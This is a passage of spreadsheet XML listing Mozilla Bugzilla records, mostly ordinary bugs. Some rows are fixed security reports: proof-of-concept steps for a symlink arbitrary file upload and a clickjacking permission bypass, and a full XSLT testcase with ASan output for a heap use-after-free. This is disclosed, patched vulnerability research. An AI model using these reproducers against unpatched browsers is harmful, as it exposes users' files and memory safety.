      <c r="R2429" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2429" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T2429" t="n">
        <v>1</v>
      </c>
      <c r="U2429" t="n">
        <v>0</v>
      </c>
      <c r="V2429" t="n">
        <v>18</v>
      </c>
      <c r="W2429" t="inlineStr">
        <is>
          <t>this bug comes from bugscape, to get coverage of the Mail triage i am filing it
inot bigzilla, adding l12y as a keyword.
Steps to reproduce:
-open Address Book ;
-go to File|Import...
-browse for a file to import, Ok the process;
//note: english string 'processing'is in english (unless it is coming from the 
server?) and if you'll get an error while Importing the "Alert" string for the 
window title will be in EN as well</t>
        </is>
      </c>
      <c r="X2429" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2430">
      <c r="A2430" t="n">
        <v>511836</v>
      </c>
      <c r="B2430" t="inlineStr">
        <is>
          <t>2009-08-21 00:59:06 -0700</t>
        </is>
      </c>
      <c r="C2430" t="inlineStr">
        <is>
          <t>"Assertion failure: JSVAL_IS_INT(v), at ../jsapi.h"</t>
        </is>
      </c>
      <c r="D2430" t="inlineStr">
        <is>
          <t>2013-01-19 14:05:02 -0800</t>
        </is>
      </c>
      <c r="E2430" t="n">
        <v>1</v>
      </c>
      <c r="F2430" t="n">
        <v>1</v>
      </c>
      <c r="G2430" t="n">
        <v>3</v>
      </c>
      <c r="H2430" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2430" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2430" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2430" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2430" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2430" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2430" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2430" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2430" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2430" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2430" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2430" t="n">
        <v>1</v>
      </c>
      <c r="U2430" t="n">
        <v>0</v>
      </c>
      <c r="V2430" t="n">
        <v>8</v>
      </c>
      <c r="W2430" t="inlineStr">
        <is>
          <t>for (a in (function () {
    return Iterator(function () {}).__proto__
})()) {
    ++b
}
asserts js debug shell without -j at Assertion failure: JSVAL_IS_INT(v), at ../jsapi.h:242
autoBisect shows it is probably related to bug 506721:
The first bad revision is:
changeset:   31070:d6f79987bf06
user:        Jason Orendorff
date:        Sun Aug 09 07:25:53 2009 -0500
summary:     Bug 506721 - Convert JSVAL_TO_INT and INT_TO_JSVAL to functions. r=Waldo.</t>
        </is>
      </c>
      <c r="X2430" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2431">
      <c r="A2431" t="n">
        <v>1813299</v>
      </c>
      <c r="B2431" t="inlineStr">
        <is>
          <t>2023-01-27 21:59:31 -0800</t>
        </is>
      </c>
      <c r="C2431" t="inlineStr">
        <is>
          <t>Arbitrary File read via social engineering and re-uploading directories containing symbolic links</t>
        </is>
      </c>
      <c r="D2431" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:41 -0700</t>
        </is>
      </c>
      <c r="E2431" t="n">
        <v>1</v>
      </c>
      <c r="F2431" t="n">
        <v>1</v>
      </c>
      <c r="G2431" t="n">
        <v>3</v>
      </c>
      <c r="H2431" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2431" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2431" t="inlineStr">
        <is>
          <t>DOM: File</t>
        </is>
      </c>
      <c r="K2431" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2431" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2431" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2431" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2431" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main115+]</t>
        </is>
      </c>
      <c r="Q2431" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2431" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2431" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T2431" t="n">
        <v>1</v>
      </c>
      <c r="U2431" t="n">
        <v>0</v>
      </c>
      <c r="V2431" t="n">
        <v>47</v>
      </c>
      <c r="W2431" t="inlineStr">
        <is>
          <t>Hi team. While looking for Firefox File upload feature and digging more about my another report (.desktop/.symlink) download. i have found a interesting exploit which can lead you to upload Arbitrary File.
Note: Chrome Fix this issue already
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1345275
Root Cause: While opening/uploading a file firefox follows the symbolic link which allows to upload arbitrary file (many of the user doen't aware about the symbolic link so major of the victim will fall on this.)
Mac also support the symblink so i hope the same is vulnerable on Mac too.
POC:
1. Open the Html file
2. unzip the downloaded file.
3. Upload the folder 
4. Boom Some other arbitrary files are uploaded.
Note: I have attached the POC files used in the Video (Also attached the POC Video)
In the POC Video i have shown the same with chrome. which was already fixed.</t>
        </is>
      </c>
      <c r="X2431" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2432">
      <c r="A2432" t="n">
        <v>1265599</v>
      </c>
      <c r="B2432" t="inlineStr">
        <is>
          <t>2016-04-18 19:34:57 -0700</t>
        </is>
      </c>
      <c r="C2432" t="inlineStr">
        <is>
          <t>developer-toolbar-toolbox-button checked attribute is gone</t>
        </is>
      </c>
      <c r="D2432" t="inlineStr">
        <is>
          <t>2018-09-24 13:24:50 -0700</t>
        </is>
      </c>
      <c r="E2432" t="n">
        <v>1</v>
      </c>
      <c r="F2432" t="n">
        <v>1</v>
      </c>
      <c r="G2432" t="n">
        <v>6</v>
      </c>
      <c r="H2432" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2432" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J2432" t="inlineStr">
        <is>
          <t>Graphic Commandline and Toolbar</t>
        </is>
      </c>
      <c r="K2432" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2432" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2432" t="inlineStr"/>
      <c r="Q2432" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2432" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2432" t="inlineStr">
        <is>
          <t>Firefox 49</t>
        </is>
      </c>
      <c r="T2432" t="n">
        <v>1</v>
      </c>
      <c r="U2432" t="n">
        <v>0</v>
      </c>
      <c r="V2432" t="n">
        <v>11</v>
      </c>
      <c r="W2432" t="inlineStr">
        <is>
          <t>Created attachment 8742605
developer-toolbar-toolbox-button-checked-attribute.png
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Build ID: 20160407164938
Steps to reproduce:
1. Start Nightly 48.0a1
2. Open Developer Toolbar (Shift + F2)
3. Click (Check) Toggle Developer Tools button (developer-toolbar-toolbox-button)
* If error counter displays, you should clear the web console output.
Actual results:
developer-toolbar-toolbox-button does not change to the checked status color, because the checked attribute is gone.
Expected results:
The checked attribute is available.</t>
        </is>
      </c>
      <c r="X2432" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2433">
      <c r="A2433" t="n">
        <v>1863083</v>
      </c>
      <c r="B2433" t="inlineStr">
        <is>
          <t>2023-11-03 14:53:54 -0700</t>
        </is>
      </c>
      <c r="C2433" t="inlineStr">
        <is>
          <t>Clickjacking to allow permission using window.moveTo in a popup</t>
        </is>
      </c>
      <c r="D2433" t="inlineStr">
        <is>
          <t>2024-06-02 18:16:33 -0700</t>
        </is>
      </c>
      <c r="E2433" t="n">
        <v>1</v>
      </c>
      <c r="F2433" t="n">
        <v>1</v>
      </c>
      <c r="G2433" t="n">
        <v>3</v>
      </c>
      <c r="H2433" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2433" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2433" t="inlineStr">
        <is>
          <t>PopupNotifications and Notification Bars</t>
        </is>
      </c>
      <c r="K2433" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2433" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2433" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2433" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2433" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main122+][adv-esr115.7+]</t>
        </is>
      </c>
      <c r="Q2433" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2433" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2433" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T2433" t="n">
        <v>1</v>
      </c>
      <c r="U2433" t="n">
        <v>0</v>
      </c>
      <c r="V2433" t="n">
        <v>26</v>
      </c>
      <c r="W2433" t="inlineStr">
        <is>
          <t>Created attachment 9361956
bandicam 2023-11-04 04-40-56-944.mp4
i found a vulnerability where user can fall for clickjacking to allow permission
I tested on Firefox version 120.0b4 (64-bit)
steps to reproduce:
1. open clickjacknew.html then click open button
2. Click the "click 3 fastly" button fastly.</t>
        </is>
      </c>
      <c r="X2433" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2434">
      <c r="A2434" t="n">
        <v>424320</v>
      </c>
      <c r="B2434" t="inlineStr">
        <is>
          <t>2008-03-21 03:54:24 -0700</t>
        </is>
      </c>
      <c r="C2434" t="inlineStr">
        <is>
          <t>Unable to add a new test plan</t>
        </is>
      </c>
      <c r="D2434" t="inlineStr">
        <is>
          <t>2008-04-02 01:10:45 -0700</t>
        </is>
      </c>
      <c r="E2434" t="n">
        <v>1</v>
      </c>
      <c r="F2434" t="n">
        <v>1</v>
      </c>
      <c r="G2434" t="n">
        <v>4</v>
      </c>
      <c r="H2434" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2434" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J2434" t="inlineStr">
        <is>
          <t>Test Plans</t>
        </is>
      </c>
      <c r="K2434" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="L2434" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2434" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2434" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2434" t="inlineStr"/>
      <c r="Q2434" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2434" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2434" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2434" t="n">
        <v>0</v>
      </c>
      <c r="U2434" t="n">
        <v>1</v>
      </c>
      <c r="V2434" t="n">
        <v>4</v>
      </c>
      <c r="W2434" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; FDM; .NET CLR 1.1.4322)
Build Identifier: 2.0
I'm unable to add a new plan and gives me a java script error though on the status bar it shows the message "Done"
I even checked in the database and could not see the newly added plan.
Reproducible: Always
Steps to Reproduce:
1.Login to bugzilla with Administrator rights (having the rights to create Test plan).
2. Click on "New Plan" from any link (either from the top frame or from the Testopia product dashboards availabale link.)
3. Enter data in all the manadatory fields.
4. Click on Submit button.
Actual Results:  
I upgraded Testopia 1.3 to 2.0. I did not face these problems with 1.3.
Expected Results:  
Data were not submitted and dos not refresh.
The plan should been created .</t>
        </is>
      </c>
      <c r="X2434" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2435">
      <c r="A2435" t="n">
        <v>1297099</v>
      </c>
      <c r="B2435" t="inlineStr">
        <is>
          <t>2016-08-22 08:15:29 -0700</t>
        </is>
      </c>
      <c r="C2435" t="inlineStr">
        <is>
          <t>LoadManagerSingleton weak reference used on multiple threads</t>
        </is>
      </c>
      <c r="D2435" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:07 -0800</t>
        </is>
      </c>
      <c r="E2435" t="n">
        <v>1</v>
      </c>
      <c r="F2435" t="n">
        <v>1</v>
      </c>
      <c r="G2435" t="n">
        <v>3</v>
      </c>
      <c r="H2435" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2435" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2435" t="inlineStr">
        <is>
          <t>Audio/Video: MediaStreamGraph</t>
        </is>
      </c>
      <c r="K2435" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L2435" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2435" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2435" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2435" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49+]</t>
        </is>
      </c>
      <c r="Q2435" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2435" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2435" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T2435" t="n">
        <v>1</v>
      </c>
      <c r="U2435" t="n">
        <v>0</v>
      </c>
      <c r="V2435" t="n">
        <v>16</v>
      </c>
      <c r="W2435" t="inlineStr">
        <is>
          <t>Introduced in https://hg.mozilla.org/mozilla-central/rev/08e7e6ddff87, bug 1208371.
Bug 956338 adds assertions to check whether weak referencing is correctly used only on a single thread.  For LoadManagerSingleton this fails.
https://treeherder.mozilla.org/logviewer.html#?job_id=26046916&amp;repo=try#L13081
https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=74cbb9192861e6cbc46a615940c28b0b24c5a3d8
tests: dom/media/tests/mochitest/test_peerConnection_*
 11:06:52     INFO -  Assertion failure: _empty || _owningThread == std::this_thread::get_id() (WeakPtr used on multiple threads), at /builds/slave/try-lx-d-000000000000000000000/build/src/obj-firefox/dist/include/mozilla/WeakPtr.h:146
 11:06:52     INFO -  #01: mozilla::detail::WeakReference&lt;mozilla::LoadManagerSingleton&gt;::get [mfbt/WeakPtr.h:146]
 11:06:52     INFO -  #02: mozilla::LoadManager::NormalUsage [dom/media/systemservices/LoadManager.h:111]
 11:06:52     INFO -  #03: webrtc::OveruseFrameDetector::Process [media/webrtc/trunk/webrtc/video_engine/overuse_frame_detector.cc:538]
 11:06:52     INFO -  #04: webrtc::ProcessThreadImpl::Process [media/webrtc/trunk/webrtc/modules/utility/source/process_thread_impl.cc:213]
 11:06:52     INFO -  #05: webrtc::ThreadPosix::Run [media/webrtc/trunk/webrtc/system_wrappers/source/thread_posix.cc:174]
This is likely a highly critical bug.</t>
        </is>
      </c>
      <c r="X2435" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2436">
      <c r="A2436" t="n">
        <v>165221</v>
      </c>
      <c r="B2436" t="inlineStr">
        <is>
          <t>2002-08-28 10:05:06 -0700</t>
        </is>
      </c>
      <c r="C2436" t="inlineStr">
        <is>
          <t>Apostrophes are not properly handled in e-mail addresses</t>
        </is>
      </c>
      <c r="D2436" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E2436" t="n">
        <v>1</v>
      </c>
      <c r="F2436" t="n">
        <v>1</v>
      </c>
      <c r="G2436" t="n">
        <v>4</v>
      </c>
      <c r="H2436" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2436" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2436" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K2436" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L2436" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2436" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2436" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2436" t="inlineStr">
        <is>
          <t>[SECURITY] [fixed in 2.16.1]</t>
        </is>
      </c>
      <c r="Q2436" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2436" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2436" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2436" t="n">
        <v>1</v>
      </c>
      <c r="U2436" t="n">
        <v>0</v>
      </c>
      <c r="V2436" t="n">
        <v>29</v>
      </c>
      <c r="W2436" t="inlineStr">
        <is>
          <t>My proper e-mail address is Tim_O'Connor@instantiations.com. RFC822 is perfectly
happy to allow me to have that apostrophe in my e-mail address but SQL is not.
So I attempted to work around SQL by doubling the apostrophe. All's well and my
account is accepted. I do not, however, receive any e-mail. Why? Because there
is no e-mail account Tim_O''Connor@instantiations.com.
When taking an e-mail address from SQL Bugzilla should check for escaped
characters (like the double apostrophe) and correct them.
I did not, by the way, try escaping the apostrophe with a back-slash as that's
not normal SQL.</t>
        </is>
      </c>
      <c r="X2436" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2437">
      <c r="A2437" t="n">
        <v>860789</v>
      </c>
      <c r="B2437" t="inlineStr">
        <is>
          <t>2013-04-11 09:10:32 -0700</t>
        </is>
      </c>
      <c r="C2437" t="inlineStr">
        <is>
          <t>enable ubuntu hw on central inbound and try</t>
        </is>
      </c>
      <c r="D2437" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E2437" t="n">
        <v>1</v>
      </c>
      <c r="F2437" t="n">
        <v>1</v>
      </c>
      <c r="G2437" t="n">
        <v>5</v>
      </c>
      <c r="H2437" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2437" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2437" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2437" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2437" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2437" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2437" t="inlineStr"/>
      <c r="Q2437" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2437" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2437" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2437" t="n">
        <v>1</v>
      </c>
      <c r="U2437" t="n">
        <v>0</v>
      </c>
      <c r="V2437" t="n">
        <v>3</v>
      </c>
      <c r="W2437" t="inlineStr">
        <is>
          <t>Created attachment 736329
do eet</t>
        </is>
      </c>
      <c r="X2437" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2438">
      <c r="A2438" t="n">
        <v>1128995</v>
      </c>
      <c r="B2438" t="inlineStr">
        <is>
          <t>2015-02-03 08:33:40 -0800</t>
        </is>
      </c>
      <c r="C2438" t="inlineStr">
        <is>
          <t>Push Socorro Release 20150203</t>
        </is>
      </c>
      <c r="D2438" t="inlineStr">
        <is>
          <t>2015-02-03 09:22:21 -0800</t>
        </is>
      </c>
      <c r="E2438" t="n">
        <v>1</v>
      </c>
      <c r="F2438" t="n">
        <v>1</v>
      </c>
      <c r="G2438" t="n">
        <v>4</v>
      </c>
      <c r="H2438" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2438" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2438" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K2438" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2438" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2438" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2438" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2438" t="inlineStr"/>
      <c r="Q2438" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2438" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2438" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2438" t="n">
        <v>1</v>
      </c>
      <c r="U2438" t="n">
        <v>0</v>
      </c>
      <c r="V2438" t="n">
        <v>4</v>
      </c>
      <c r="W2438" t="inlineStr">
        <is>
          <t>https://ci.mozilla.org/job/socorro-release/1601/artifact/socorro.tar.gz</t>
        </is>
      </c>
      <c r="X2438" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2439">
      <c r="A2439" t="n">
        <v>467000</v>
      </c>
      <c r="B2439" t="inlineStr">
        <is>
          <t>2008-11-27 07:51:33 -0800</t>
        </is>
      </c>
      <c r="C2439" t="inlineStr">
        <is>
          <t>ReleaseUpdatesFactory failed to upload partial MARs because of permission problems</t>
        </is>
      </c>
      <c r="D2439" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2439" t="n">
        <v>1</v>
      </c>
      <c r="F2439" t="n">
        <v>1</v>
      </c>
      <c r="G2439" t="n">
        <v>5</v>
      </c>
      <c r="H2439" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2439" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2439" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2439" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2439" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2439" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2439" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2439" t="inlineStr">
        <is>
          <t>[hg-automation]</t>
        </is>
      </c>
      <c r="Q2439" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2439" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2439" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2439" t="n">
        <v>1</v>
      </c>
      <c r="U2439" t="n">
        <v>0</v>
      </c>
      <c r="V2439" t="n">
        <v>8</v>
      </c>
      <c r="W2439" t="inlineStr">
        <is>
          <t>All other uploads for 3.1b1 and 3.1b2 were done as 'cltbld' - and the directories had 644 permissions. We should probably just make everything from a release upload as either 'ffxbld' or 'cltbld' - but at a bare minimum we need to set the permissions on the candidates dir to 664, and owned by the 'firefox' group. This would let either user upload to them.</t>
        </is>
      </c>
      <c r="X2439" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2440">
      <c r="A2440" t="n">
        <v>1311687</v>
      </c>
      <c r="B2440" t="inlineStr">
        <is>
          <t>2016-10-20 06:51:38 -0700</t>
        </is>
      </c>
      <c r="C2440" t="inlineStr">
        <is>
          <t>ASan heap UAF via xsl:key and xsl:variable</t>
        </is>
      </c>
      <c r="D2440" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:38 -0700</t>
        </is>
      </c>
      <c r="E2440" t="n">
        <v>1</v>
      </c>
      <c r="F2440" t="n">
        <v>1</v>
      </c>
      <c r="G2440" t="n">
        <v>3</v>
      </c>
      <c r="H2440" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2440" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2440" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K2440" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2440" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2440" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2440" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2440" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q2440" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2440" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2440" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2440" t="n">
        <v>1</v>
      </c>
      <c r="U2440" t="n">
        <v>0</v>
      </c>
      <c r="V2440" t="n">
        <v>46</v>
      </c>
      <c r="W2440" t="inlineStr">
        <is>
          <t>Tested with XPCshell "JavaScript-C52.0a1"
[+] XML document
&lt;foo /&gt;
[+] XSLT code
&lt;xsl:transform xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="2.0"&gt;
 &lt;xsl:variable name="v"&gt;
  &lt;xsl:foobar /&gt;
 &lt;/xsl:variable&gt;
 &lt;xsl:key match="/" name="k" use="$v" /&gt;
 &lt;xsl:template match="/"&gt;
  &lt;xsl:value-of select="key('k', '/')" /&gt;
 &lt;/xsl:template&gt;
&lt;/xsl:transform&gt;
[+] ASan output
==2814==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300006c160 at pc 0x7f1c68baee30 bp 0x7ffdb6bc1ca0 sp 0x7ffdb6bc1c98
READ of size 8 at 0x60300006c160 thread T0
    #0 0x7f1c68baee2f in txExecutionState::~txExecutionState() /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:98:5
    #1 0x7f1c68be6535 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:700:1
    #2 0x7f1c68bec01b in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:644:12
    #3 0x7f1c68bec01b in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1321
    #4 0x7f1c6699d27d in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XSLTProcessorBinding.cpp:154:43
    #5 0x7f1c671ce5a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2857:13
    #6 0x7f1c6d3c2a35 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #7 0x7f1c6d3c2a35 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #8 0x7f1c6d3a8dda in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #9 0x7f1c6d3a8dda in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
